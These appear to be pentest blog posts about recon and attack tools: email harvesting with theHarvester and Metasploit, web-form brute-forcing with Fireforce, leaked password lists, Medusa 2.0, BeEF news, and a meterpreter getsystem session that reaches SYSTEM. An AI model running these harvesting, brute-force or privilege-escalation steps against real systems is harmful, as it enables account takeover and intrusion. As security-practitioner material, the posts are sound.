Like GI Joe always said: Knowing is half the battle… And so it is the same with hacking.

One of the first parts of recon in a pentest is gathering valid login names and emails. We can use these to profile our target, bruteforce authentication systems, send client-side attacks (through phishing), look through social networks for juicy info on platforms and technologies, etc.

Where do we get this info? Well without doing a full-blown Open Source Recon (OSINT) style assessment, we can use two simple scripts; Metasploit's search_email_collector.rb and Edge-Security's theHarvester.

theHarvester (luckily for us) just updated to v1.5 and has now fixed some of its previous bugs with searching Bing and LinkedIn. It supports searching Google, Bing, PGP servers, and LinkedIn. Metasploit, under modules/auxiliary/gather, has search_email_collector.rb and uses similar techniques for Google, Bing, and Yahoo.

A quick usage below identifies some users

p.s. you can one line search_email_collector like so in msfcli:

ruby /framework3/msfcli auxiliary/gather/search_email_collector DOMAIN=your_target_domain OUTFILE=output_file_you_want_results_in E

Check the last line for an example wrapper for these two tools.

Read the rest of this entry »

Bruting web forms usually is part of a web app assessment. We love to use Hydra, Medusa, or Wfuzz for this but we recently stumbled across a tool that makes it much easier.  It's called Fireforce. It's a Firefox extension that gives you point and click bruting.

We ran it in our labs with about a 74% success rate, meaning it mapped the parameters for web form logins correctly and gave us the correct password back (aka it didn't spaz out and kill our browser). So it isn't perfect, but we're willing to forgive that for it's ease of use.  It's dead simple. Give it a username, right click in the form password field, give it the text the login form gives on an unsuccessful login, and a bruteforce list. Make sure to read the documentation as you'll need to use a seperate firefox profile if you wish to  browse will while using the tool, (it's a mem/cpu hogger). *note* We haven't done a code analysis on the extension, use at your own risk in your lab.

Also, yesterday we tweeted about Ron Bowes of Skullsecurity.com's password analysis and password list collection which are much win. Ron has done some data analysis on some of the leaked password lists of the last few years like RockYou, MySpace, and PhpBB. He also stores the default password lists of many common industry tools, and even the passwords conficker used to spread. I'd grab these lists if you dont already have them, who knows how long they will stay up.  Ron has actually been on a hot-streak lately, as he has released an awesome tool called dnscat. He also did some VMware Guest stealing NSE scripts which we will post on later

Remember, password bruteforcing is great as long as you don't DOS the application/server. Also remember just because it's a web form doesnt mean its not tied to another backend system (ldap, etc) so be aware you could lockout users.

Also you might wanna check out  our writeup a bit back on password attacks here.

Get Fireforce Here

Get Password Lists Here

Get DNScat Here

Catch Ron on twitter: @iagox86

Profit…

A few weeks ago Chris Gates (ala Attack Research/Carnal Ownage) and Joshua Gauthier showed some quick snippets of Metasploit’s Getsystem extension. Getsystem is meterpreter’s new (windows) privilege escalation extension used in the priv module.

Getsystem uses several techniques for priv escalation:

• Windows Impersonation Tokens (fixed by MS09-012)
• Abusing LSASS via token passing (Pass-the-Hash) which requires Administrator anyway.
• Exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM, if you are lucky they run as a domain administrator).
• Improved KiTrap0D exploit released by Tavis Ormandy ( MS10-015 patched as of now)

As more privilege escalation exploits appear this year they will no doubt be rolled into the Getsystem extension which i will be keeping a watchful eye on. Thanks to Stephen Fewer for adding the new functionality to Getsystem.

Also, check out Bernardo Damele’s (author of SQLmap!) walkthrough on integrating Metasploit privilege escalation via SQLmap for post database exploitation. Here.

And a sample of the KiTrap0D exploit below in MSF by Pieter Danhieux (not Getsystem but same functionality):

Kitrap0d in Metasploi 3.3.4-DEV

meterpreter > use priv
Loading extension priv…success.

meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:

-h Help Banner.
-t The technique to use. (Default to ‘0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
…got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

On the heels of us posting about Ncrack, Nmap’s new password brutforcer, the foofus group had go and update Medusa!

Medusa, which has been our go-to tool for years, is now 2.0! This is it’s first major release in two years, and it has a multitude of useful changes.

-Pool-based thread handling
-Modules now request next credential set
-Secondary user credential queue added for missed login tests.
-Host and User-level Resume
-Multiple Module fixes

It’s not like pentesters have never had multiple tools to do the same thing, in fact we like both Ncrack and Medusa (and at this time Medusa has far more supported protocols/services).

Check out the changes here

The usage here

and download it here

About 7 days ago Wade Alcorn made the announcement that Benjamin Mosse, developer of the other popular browser attack tool Browser Rider, would be involved in an initiative to roll Browser Rider into the BeEF.

This is big news.

BeEF and Browser Rider have long been somewhat of rivals, and a joint effort by two brilliant devs for more browser hackery should just give you that warm-fuzzy-feeling like when you watch A Charlie Browns Christmas.

If that wasn’t enough, today Wade announced that Ferruh Mavituna would be joining the dev team. Is that the same Ferruh Mavituna who wrote one of the more popular SQL injection cheat sheets? The same guy who we just interviewed on the new web-app scanner Netsparker? (who we around the office affectionately refer to as “the sparkler“)

Indeed it is. He will be actively rolling XSSTunnel and XSSShell into BeEF.

Ferruh joins Wade, Benjamin, and more of our favorite BeEF Devs (Jabra and Ryan Linn) in making browser based attacks easy to perform, extensible, and just plain bad-ass.

Download BeEF Here

Check out John Strand’s Intro to BeEF Video Here and Here

And check out Ryan’s BeEF Exploitation Videos Here

And check out Jabra’s Metasploit and BeEF mashup videos Here

Don’t make the Cow angry…